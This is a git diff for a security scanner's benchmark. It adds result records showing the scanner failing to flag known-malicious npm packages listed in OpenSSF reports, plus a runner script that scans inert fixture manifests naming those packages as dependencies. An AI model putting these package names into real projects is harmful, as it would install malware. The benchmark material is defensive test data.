"expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2024-10692", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907:4a871bf8d97a4ffd916e71d4102e1a09b3d38d6d", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-191389", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a:5a611b4143b8b29595533761d56448dc59603cd8", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2026-2631", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa:4f055c91abd296b619826fad2bb36752f7f939a7", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-47613", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350:2aaacc868e3b819e0e9d4dbb9a9d58b5d83906ff", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2026-407", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a:9897f3726f56deb821827c8de18501abead258f2", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15287", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15287; report blob 910018e9ea790fae8a6c9141550913cf26e5275d", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d:8082edb8ce35bdad9a7e5c961b346e42d7d218a3", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15288", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03:c79c0836d3e4e5c0e39da8e406463977b538d0d7", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-3985", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343:655664c120057afcca26233ac537a2622d3d7e2c", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + } + ] +} diff --git a/benchmark/run.mjs b/benchmark/run.mjs new file mode 100644 index 0000000..bcaa844 --- /dev/null +++ b/benchmark/run.mjs @@ -0,0 +1,677 @@ +import { createHash } from "node:crypto" +import { execFileSync } from "node:child_process" +import { mkdir, readFile, writeFile } from "node:fs/promises" +import { dirname, join } from "node:path" +import { fileURLToPath } from "node:url" + +import { scanGitHubRepo } from "../../flagrix-scanner-core/dist/index.js" + +const benchmarkDir = dirname(fileURLToPath(import.meta.url)) +const projectDir = join(benchmarkDir, "..") +const resultsDir = join(benchmarkDir, "results") +const LOCKED_CORPUS = join(benchmarkDir, "corpus.lock.json") +const SOURCE_CORPUS = join(benchmarkDir, "corpus.json") +const SHA_PATTERN = /^[0-9a-f]{40}$/i +const VERDICT_RANK = { low: 0, medium: 1, high: 2 } +const GITHUB_GRAPHQL_BATCH_SIZE = 50 +const NPM_PREFETCH_CONCURRENCY = 12 +const GITHUB_MAX_FILES = 200 +const GITHUB_MAX_FILE_SIZE = 1024 * 1024 +const GITHUB_PRIORITY_FILES = [ + "package.json", "package-lock.json", "requirements.txt", "setup.py", "Pipfile", + ".npmrc", ".yarnrc", "Makefile", +] +const GITHUB_SCANNABLE_EXTENSIONS = [ + ".js", ".jsx", ".mjs", ".cjs", ".ts", ".tsx", ".py", ".rb", ".php", + ".go", ".sh", ".ps1", ".psm1", ".bat", ".cmd", ".vbs", ".html", ".htm", +] + +function parseArgs(argv) { + const options = { corpus: null, sample: null, resume: false, limit: null } + for (let index = 0; index < argv.length; index++) { + const arg = argv[index] + if (arg === "--corpus") options.corpus = argv[++index] + else if (arg === "--sample") options.sample = argv[++index] + else if (arg === "--resume") options.resume = true + else if (arg === "--limit") { + options.limit = Number.parseInt(argv[++index], 10) + if (!Number.isInteger(options.limit) || options.limit < 1) { + throw new Error("--limit must be a positive integer") + } + } + else if (arg === "--help" || arg === "-h") options.help = true + else throw new Error(`Unknown argument: ${arg}`) + } + return options +} + +function help() { + return `Flagrix benchmark + +Usage: + npm run benchmark -- [--corpus ] [--sample ] [--resume] [--limit ] + +The runner never clones repositories or executes fixture code. GitHub samples +must be pinned in benchmark/corpus.lock.json before they can run. Results are +checkpointed after every sample, so an interrupted run can safely use --resume.` +} + +async function readJson(path) { + return JSON.parse(await readFile(path, "utf8")) +} + +async function loadCorpus() { + try { + return { corpus: await readJson(LOCKED_CORPUS), path: LOCKED_CORPUS } + } catch { + const corpus = await readJson(SOURCE_CORPUS) + const additions = await readJson(join(benchmarkDir, "github-projects.json")) + const osv = await readJson(join(benchmarkDir, "osv-malicious-packages.json")) + corpus.samples.push(...additions.projects.map(projectSample)) + corpus.samples.push(...osv.packages.map((entry) => osvSample(osv.source, entry))) + return { corpus, path: SOURCE_CORPUS } + } +} + +function osvSample(source, entry) { + const reportPath = `osv/malicious/${source.ecosystem}/${entry.name}/${entry.reportId}.json` + return { + sampleId: `malicious-osv-${entry.reportId.toLowerCase()}`, + corpus: "real-malicious", + label: "known-malicious-metadata", + labelSource: `OpenSSF OSV ${entry.reportId}; report blob ${entry.reportBlobSha}`, + sourceUrl: `https://github.com/${source.repository}/blob/${source.commit}/${reportPath}`, + immutableRef: `osv:${source.commit}:${entry.reportBlobSha}`, + expectedDetectionCategories: ["SUSPICIOUS_DEPENDENCY"], + minimumExpectedVerdict: "high", + target: { + kind: "fixture", + files: { + "package.json": JSON.stringify({ + name: `flagrix-inert-${entry.reportId.toLowerCase()}`, + private: true, + dependencies: { [entry.name]: entry.version }, + }) + "\n", + }, + }, + } +} + +function projectSample(project) { + const prefix = project.corpus === "noisy-legitimate" ? "noisy" : "reference" + const slug = project.repo.toLowerCase().replaceAll("/", "-").replaceAll(".", "-") + return { + sampleId: `${prefix}-${slug}`, + corpus: project.corpus, + label: "reference-clean", + labelSource: "Expanded commit-pinned reference corpus", + sourceUrl: `https://github.com/${project.repo}`, + immutableRef: null, + maximumExpectedVerdict: "low", + expectedDetectionCategories: [], + target: { kind: "github", repo: project.repo, ref: null }, + } +} + +function normalizeSignatures(data) { + return { + version: data.version, + lastUpdated: new Date(data.lastUpdated ?? 0), + maliciousPackages: data.maliciousPackages ?? data.malicious_packages ?? [], + yaraRules: data.yaraRules ?? data.yara_rules ?? [], + knownBadHashes: data.knownBadHashes ?? data.known_bad_hashes ?? [], + userProfileRules: data.userProfileRules ?? data.user_profile_rules, + } +} + +function gitMetadata(path) { + try { + const sha = execFileSync("git", ["-C", path, "rev-parse", "HEAD"], { + encoding: "utf8", + }).trim() + const dirty = execFileSync("git", ["-C", path, "status", "--porcelain"], { + encoding: "utf8", + }).trim().length > 0 + return { sha, dirty } + } catch { + return { sha: null, dirty: null } + } +} + +function resolveGithubToken() { + if (process.env.FLAGRIX_GITHUB_TOKEN) return process.env.FLAGRIX_GITHUB_TOKEN + try { + return execFileSync("gh", ["auth", "token"], { encoding: "utf8", stdio: ["ignore", "pipe", "ignore"] }).trim() || undefined + } catch { + return undefined + } +} + +function fixtureSha(sample) { + return createHash("sha256") + .update(JSON.stringify(sample.target.files)) + .digest("hex") + .slice(0, 40) +} + +function fixtureFetch(files, commitSha) { + return async (input) => { + const url = String(input) + if (url.includes("api.npmjs.org")) { + return new Response(JSON.stringify({ downloads: 0 }), { status: 200 }) + } + if (/\/commits\/[^/]+$/.test(url)) { + return new Response(JSON.stringify({ sha: commitSha }), { status: 200 }) + } + if (url.includes("/git/trees/")) { + return new Response(JSON.stringify({ + sha: commitSha, + truncated: false, + tree: Object.entries(files).map(([path, content]) => ({ + path, + type: "blob", + sha: createHash("sha1").update(content).digest("hex"), + size: Buffer.byteLength(content), + url: path, + })), + }), { status: 200 }) + } + const contentMatch = url.match(/\/contents\/(.+?)\?ref=/) + if (contentMatch) { + const path = decodeURIComponent(contentMatch[1]) + if (!(path in files)) return new Response("{}", { status: 404 }) + return new Response(JSON.stringify({ + content: Buffer.from(files[path], "utf8").toString("base64"), + }), { status: 200 }) + } + return new Response("{}", { status: 404 }) + } +} + +/** + * Preserve the scanner's exact API responses while overlapping its otherwise + * sequential content reads. The bounded pool is benchmark-only: it changes + * elapsed time, not the pinned tree, selected files, detector inputs, or score. + */ +function githubPrefetchFetch(baseFetch) { + const contentCache = new Map() + const npmQueue = [] + let npmActive = 0 + let scheduled = false + + function levenshteinDistance(a, b) { + const rows = Array.from({ length: a.length + 1 }, (_, row) => + Array.from({ length: b.length + 1 }, (_, column) => + row === 0 ? column : column === 0 ? row : 0 + ) + ) + for (let row = 1; row <= a.length; row++) { + for (let column = 1; column <= b.length; column++) { + rows[row][column] = a[row - 1] === b[column - 1] + ? rows[row - 1][column - 1] + : 1 + Math.min(rows[row - 1][column - 1], rows[row - 1][column], rows[row][column - 1]) + } + } + return rows[a.length][b.length] + } + + function mayNeedNpmLookup(name) { + if (name.startsWith("@")) return false + const popular = [ + "lodash", "express", "react", "axios", "moment", "webpack", "babel", + "typescript", "eslint", "prettier", "jest", "mocha", "bcrypt", "crypto", "request", + ] + return popular.some((candidate) => + name !== candidate && Math.abs(name.length - candidate.length) <= 3 && + levenshteinDistance(name, candidate) <= 2 + ) + } + + function pumpNpmQueue() { + while (npmActive < NPM_PREFETCH_CONCURRENCY && npmQueue.length > 0) { + const task = npmQueue.shift() + npmActive++ + baseFetch(task.url, { signal: AbortSignal.timeout(5000) }) + .then(task.resolve, task.reject) + .finally(() => { + npmActive-- + pumpNpmQueue() + }) + } + } + + function scheduleNpmLookups(content) { + try { + const manifest = JSON.parse(content) + const dependencies = { ...manifest.dependencies, ...manifest.devDependencies } + for (const name of Object.keys(dependencies)) { + if (!mayNeedNpmLookup(name)) continue + const url = `https://api.npmjs.org/downloads/point/last-week/${encodeURIComponent(name)}` + if (contentCache.has(url)) continue + let resolve + let reject + const response = new Promise((onResolve, onReject) => { + resolve = onResolve + reject = onReject + }) + contentCache.set(url, response) + npmQueue.push({ url, resolve, reject }) + } + pumpNpmQueue() + } catch { + // Invalid manifests are ignored by the scanner too. + } + } + + function schedule(tree, owner, repo, commitSha, init) { + const files = [] + for (const item of tree.tree ?? []) { + if (item.type !== "blob") continue + const eligible = GITHUB_PRIORITY_FILES.some((name) => item.path.endsWith(name)) || + GITHUB_SCANNABLE_EXTENSIONS.some((extension) => item.path.endsWith(extension)) + if (!eligible || (item.size !== undefined && item.size > GITHUB_MAX_FILE_SIZE)) continue + if (files.length >= GITHUB_MAX_FILES) break + files.push(item) + } + + const tasks = files.map((file) => { + const url = `https://api.github.com/repos/${owner}/${repo}/contents/${file.path}?ref=${commitSha}` + let resolve + let reject + const response = new Promise((onResolve, onReject) => { + resolve = onResolve + reject = onReject + }) + contentCache.set(url, response) + return { file, url, resolve, reject } + }) + + async function fetchBatch(batch) { + const declarations = batch.map((_, index) => `$expr${index}:String!`).join(",") + const fields = batch.map((_, index) => + `b${index}:object(expression:$expr${index}){... on Blob{text isBinary isTruncated}}` + ).join(" ") + const variables = { owner, repo } + batch.forEach((task, index) => { + variables[`expr${index}`] = `${commitSha}:${task.file.path}` + }) + + try { + const response = await baseFetch("https://api.github.com/graphql", { + ...init, + method: "POST", + body: JSON.stringify({ + query: `query($owner:String!,$repo:String!,${declarations}){repository(owner:$owner,name:$repo){${fields}}}`, + variables, + }), + }) + if (!response.ok) throw new Error(`GitHub GraphQL ${response.status}`) + const payload = await response.json() + if (payload.errors) throw new Error(payload.errors.map((error) => error.message).join("; ")) + if (process.env.FLAGRIX_BENCHMARK_DEBUG) { + console.error(`graphql-prefetch ${owner}/${repo}: ${batch.length} blobs`) + } + + await Promise.all(batch.map(async (task, index) => { + const blob = payload.data?.repository?.[`b${index}`] + try { + if (!blob || blob.isBinary || blob.isTruncated || typeof blob.text !== "string") { + task.resolve(await baseFetch(task.url, init)) + return + } + if (task.file.path.endsWith("package.json")) scheduleNpmLookups(blob.text) + task.resolve(new Response(JSON.stringify({ + content: Buffer.from(blob.text, "utf8").toString("base64"), + }), { status: 200 })) + } catch (error) { + task.reject(error) + } + })) + } catch (error) { + if (process.env.FLAGRIX_BENCHMARK_DEBUG) { + console.error(`graphql-prefetch fallback ${owner}/${repo}: ${error instanceof Error ? error.message : error}`) + } + await Promise.all(batch.map(async (task) => { + try { + task.resolve(await baseFetch(task.url, init)) + } catch (error) { + task.reject(error) + } + })) + } + } + + for (let offset = 0; offset < tasks.length; offset += GITHUB_GRAPHQL_BATCH_SIZE) { + void fetchBatch(tasks.slice(offset, offset + GITHUB_GRAPHQL_BATCH_SIZE)) + } + } + + return async (input, init) => { + const url = String(input) + const cached = contentCache.get(url) + if (cached) return cached + + const response = await baseFetch(input, init) + const treeMatch = url.match( + /api\.github\.com\/repos\/([^/]+)\/([^/]+)\/git\/trees\/([0-9a-f]{40})\?recursive=1/i + ) + if (!scheduled && response.ok && treeMatch) { + scheduled = true + const tree = await response.clone().json() + schedule(tree, treeMatch[1], treeMatch[2], treeMatch[3], init) + } + return response + } +} + +function findingRule(finding) { + return finding.pattern || finding.type +} + +function evaluate(sample, result) { + const triggered = [...new Set(result.findings.map(findingRule))] + const expected = sample.expectedDetectionCategories ?? [] + const categoryDetected = expected.length === 0 + ? true + : expected.every((category) => + result.findings.some((finding) => finding.pattern === category || finding.type === category) + ) + + const verdictPass = sample.minimumExpectedVerdict + ? VERDICT_RANK[result.riskLevel] >= VERDICT_RANK[sample.minimumExpectedVerdict] + : sample.maximumExpectedVerdict + ? VERDICT_RANK[result.riskLevel] <= VERDICT_RANK[sample.maximumExpectedVerdict] + : true + + const isReference = sample.label === "reference-clean" + const reviewRequired = isReference && result.findings.some( + (finding) => finding.severity === "high" || finding.severity === "critical" + ) + + return { + categoryDetected, + verdictPass, + testPassed: categoryDetected && verdictPass, + triggered, + falsePositiveNotes: reviewRequired + ? "Manual review required; this result is not yet classified as a false positive." + : "", + } +} + +function flattenFinding(finding) { + return { + severity: finding.severity, + confidence: finding.confidence ?? "unspecified", + type: finding.type, + rule: findingRule(finding), + file: finding.file ?? "", + line: finding.line ?? finding.evidence?.[0]?.line ?? null, + description: finding.description, + } +} + +async function runSample(sample, signatures, token) { + const started = Date.now() + let result + let immutableRef = sample.immutableRef + + if (sample.target.kind === "fixture") { + const commitSha = fixtureSha(sample) + const originalFetch = global.fetch + try { + global.fetch = fixtureFetch(sample.target.files, commitSha) + result = await scanGitHubRepo({ + owner: "flagrix-benchmark", + repo: sample.sampleId, + branch: commitSha, + url: `fixture://${sample.sampleId}`, + }, { signatures }) + } finally { + global.fetch = originalFetch + } + immutableRef = `${sample.immutableRef}:${commitSha}` + } else { + const ref = sample.target.ref ?? sample.immutableRef + if (!SHA_PATTERN.test(ref ?? "")) { + return { + sampleId: sample.sampleId, + corpus: sample.corpus, + label: sample.label, + labelSource: sample.labelSource, + sourceUrl: sample.sourceUrl, + immutableRef: ref ?? "", + expectedDetectionCategories: sample.expectedDetectionCategories ?? [], + minimumExpectedVerdict: sample.minimumExpectedVerdict ?? "", + maximumExpectedVerdict: sample.maximumExpectedVerdict ?? "", + status: "skipped-unpinned", + testPassed: null, + error: "GitHub target is not locked to a 40-character commit SHA.", + durationMs: Date.now() - started, + } + } + const [owner, repo] = sample.target.repo.split("/") + const originalFetch = global.fetch + try { + global.fetch = githubPrefetchFetch(originalFetch) + result = await scanGitHubRepo({ + owner, + repo, + branch: ref, + url: `https://github.com/${sample.target.repo}`, + }, { signatures, githubToken: token }) + } finally { + global.fetch = originalFetch + } + immutableRef = result.commitSha ?? ref + } + + const evaluation = evaluate(sample, result) + return { + sampleId: sample.sampleId, + corpus: sample.corpus, + label: sample.label, + labelSource: sample.labelSource, + sourceUrl: sample.sourceUrl, + immutableRef, + expectedDetectionCategories: sample.expectedDetectionCategories ?? [], + minimumExpectedVerdict: sample.minimumExpectedVerdict ?? "", + maximumExpectedVerdict: sample.maximumExpectedVerdict ?? "", + status: "completed", + testPassed: evaluation.testPassed, + categoryDetected: evaluation.categoryDetected, + verdictPass: evaluation.verdictPass, + actualVerdict: result.riskLevel, + actualScore: result.riskScore, + safeToClone: result.safeToClone, + rulesTriggered: evaluation.triggered, + falsePositiveNotes: evaluation.falsePositiveNotes, + findings: result.findings.map(flattenFinding), + filesScanned: result.scanSummary.filesScanned, + filesSkipped: result.scanSummary.skippedCount, + treeTruncated: result.scanSummary.treeTruncated, + durationMs: Date.now() - started, + error: "", + } +} + +function gate(value, evaluated) { + return evaluated ? value : null +} + +function calculateMetrics(results) { + const completed = results.filter((row) => row.status === "completed") + const critical = completed.filter((row) => row.corpus === "critical-fixture") + const malicious = completed.filter((row) => row.corpus === "real-malicious") + const references = completed.filter((row) => row.label === "reference-clean") + const criticalReferenceFindings = references.filter((row) => + row.findings.some((finding) => finding.severity === "critical") + ).length + const actionableReferenceFindings = references.filter((row) => + row.findings.some((finding) => finding.severity === "high" || finding.severity === "critical") + ).length + const highReferenceVerdicts = references.filter((row) => row.actualVerdict === "high").length + + const criticalDetected = critical.filter((row) => row.categoryDetected).length + const maliciousDetected = malicious.filter((row) => row.categoryDetected).length + return { + samplesDefined: results.length, + samplesCompleted: completed.length, + samplesPassed: completed.filter((row) => row.testPassed).length, + criticalFixturesDetected: criticalDetected, + criticalFixturesTotal: critical.length, + criticalFixtureDetectionRate: critical.length ? criticalDetected / critical.length : null, + maliciousSamplesDetected: maliciousDetected, + maliciousSamplesTotal: malicious.length, + maliciousDetectionRate: malicious.length ? maliciousDetected / malicious.length : null, + referenceSamplesTotal: references.length, + referenceHighVerdicts: highReferenceVerdicts, + referenceHighVerdictRate: references.length ? highReferenceVerdicts / references.length : null, + referenceSamplesWithHighOrCriticalFindings: actionableReferenceFindings, + referenceCriticalFindings: criticalReferenceFindings, + gates: { + criticalFixtures100Percent: gate(criticalDetected === critical.length, critical.length > 0), + maliciousDetectionAtLeast90Percent: gate( + maliciousDetected / malicious.length >= 0.9, + malicious.length > 0 + ), + zeroCriticalReferenceFindings: gate(criticalReferenceFindings === 0, references.length > 0), + referenceHighVerdictsAtMost5Percent: gate( + highReferenceVerdicts / references.length <= 0.05, + references.length > 0 + ), + }, + } +} + +function csvCell(value) { + const text = Array.isArray(value) ? value.join(" | ") : String(value ?? "") + return `"${text.replaceAll('"', '""')}"` +} + +function toCsv(results, metadata) { + const headers = [ + "sample_id", "corpus", "label", "label_source", "source_url", "immutable_ref", + "expected_detection_category", "minimum_expected_verdict", "maximum_expected_verdict", + "status", "test_passed", "category_detected", "verdict_pass", "actual_verdict", + "actual_score", "safe_to_clone", "rules_triggered", "finding_severities", + "finding_confidences", "false_positive_notes", "files_scanned", "files_skipped", + "tree_truncated", "duration_ms", "engine_version", "engine_commit_sha", + "detection_rules_version", "detection_rules_commit_sha", "error", + ] + const rows = results.map((row) => [ + row.sampleId, row.corpus, row.label, row.labelSource, row.sourceUrl, row.immutableRef, + row.expectedDetectionCategories, row.minimumExpectedVerdict, row.maximumExpectedVerdict, + row.status, row.testPassed, row.categoryDetected, row.verdictPass, row.actualVerdict, + row.actualScore, row.safeToClone, row.rulesTriggered ?? [], + row.findings?.map((finding) => finding.severity) ?? [], + row.findings?.map((finding) => finding.confidence) ?? [], row.falsePositiveNotes, + row.filesScanned, row.filesSkipped, row.treeTruncated, row.durationMs, + metadata.engineVersion, metadata.engineCommitSha, metadata.rulesVersion, + metadata.rulesCommitSha, row.error, + ]) + return [headers, ...rows].map((row) => row.map(csvCell).join(",")).join("\n") + "\n" +} + +async function writeCheckpoint(results, metadata) { + const report = { metadata, metrics: calculateMetrics(results), results } + await Promise.all([ + writeFile(join(resultsDir, "latest.json"), JSON.stringify(report, null, 2) + "\n"), + writeFile(join(resultsDir, "latest.csv"), toCsv(results, metadata)), + ]) + return report +} + +async function main() { + const options = parseArgs(process.argv.slice(2)) + if (options.help) { + console.log(help()) + return + } + + const [{ corpus, path: corpusPath }, rawSignatures, corePackage, cliPackage] = await Promise.all([ + loadCorpus(), + readJson(join(projectDir, "assets", "signatures-snapshot.json")), + readJson(join(projectDir, "..", "flagrix-scanner-core", "package.json")), + readJson(join(projectDir, "package.json")), + ]) + const signatures = normalizeSignatures(rawSignatures) + const engineGit = gitMetadata(join(projectDir, "..", "flagrix-scanner-core")) + const rulesGit = gitMetadata(join(projectDir, "..", "flagrix-detection-rules")) + const metadata = { + benchmarkVersion: corpus.benchmarkVersion, + runAt: new Date().toISOString(), + corpusPath, + cliVersion: cliPackage.version, + engineVersion: corePackage.version, + engineCommitSha: engineGit.sha, + engineDirty: engineGit.dirty, + rulesVersion: signatures.version, + rulesCommitSha: rulesGit.sha, + rulesDirty: rulesGit.dirty, + } + + let samples = corpus.samples + if (options.corpus) samples = samples.filter((sample) => sample.corpus === options.corpus) + if (options.sample) samples = samples.filter((sample) => sample.sampleId === options.sample) + if (samples.length === 0) throw new Error("No benchmark samples matched the selection.") + + await mkdir(resultsDir, { recursive: true }) + let previous = new Map() + if (options.resume) { + try { + const prior = await readJson(join(resultsDir, "latest.json")) + previous = new Map(prior.results.map((row) => [row.sampleId, row])) + } catch { + // No prior run to resume. + } + } + + const results = [] + const githubToken = resolveGithubToken() + let newlyAttempted = 0 + for (const sample of samples) { + if (previous.get(sample.sampleId)?.status === "completed") { + results.push(previous.get(sample.sampleId)) + console.error(`resume ${sample.sampleId}`) + continue + } + if (options.limit !== null && newlyAttempted >= options.limit) break + newlyAttempted++ + try { + const row = await runSample(sample, signatures, githubToken) + results.push(row) + console.error(`${row.status} ${sample.sampleId}${row.actualVerdict ? ` → ${row.actualVerdict}` : ""}`) + } catch (error) { + results.push({ + sampleId: sample.sampleId, + corpus: sample.corpus, + label: sample.label, + labelSource: sample.labelSource, + sourceUrl: sample.sourceUrl, + immutableRef: sample.immutableRef ?? sample.target.ref ?? "", + expectedDetectionCategories: sample.expectedDetectionCategories ?? [], + minimumExpectedVerdict: sample.minimumExpectedVerdict ?? "", + maximumExpectedVerdict: sample.maximumExpectedVerdict ?? "", + status: "error", + testPassed: false, + error: error instanceof Error ? error.message : String(error), + }) + console.error(`error ${sample.sampleId}: ${error instanceof Error ? error.message : error}`) + await writeCheckpoint(results, metadata) + if (/rate limit/i.test(error instanceof Error ? error.message : String(error))) break + continue + } + await writeCheckpoint(results, metadata) + } + + const report = await writeCheckpoint(results, metadata) + const timestamp = metadata.runAt.replaceAll(":", "-").replaceAll(".", "-") + await writeFile(join(resultsDir, `${timestamp}.json`), JSON.stringify(report, null, 2) + "\n") + console.log(JSON.stringify({ metadata, metrics: report.metrics }, null, 2)) +} + +main().catch((error) => { + console.error(`benchmark: ${error instanceof Error ? error.message : error}`) + process.exitCode = 1 +}) diff --git a/package-lock.json b/package-lock.json index 79deca8..fba9d47 100644 --- a/package-lock.json +++ b/package-lock.json @@ -16,7 +16,7 @@ "flagrix": "dist/cli.js" }, "devDependencies": { - "@flagrix/scanner-core": "^0.1.3", + "@flagrix/scanner-core": "^0.2.0", "@types/node": "^20.0.0", "tsup": "^8.0.0", "typescript": "^5.0.0", @@ -469,9 +469,9 @@ } }, "node_modules/@flagrix/scanner-core": { - "version": "0.1.3", - "resolved": 